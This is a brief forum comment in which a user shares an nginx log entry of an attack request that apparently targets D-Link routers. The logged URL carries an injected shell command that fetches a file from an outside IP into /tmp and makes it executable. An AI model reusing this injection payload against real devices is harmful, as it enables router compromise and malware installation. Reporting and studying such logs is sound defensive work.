[cs02rm0]

I got this too (amongst other hosts).

nginx_1 | 197.39.15.48 - - [30/Aug/2018:14:51:22 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.112.150/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks... HTTP/1.1" 400 173 "-" "LMAO/2.0" "-"

Apparently targeting dlink routers - https://twitter.com/txalin/status/1007625620090707974?lang=e...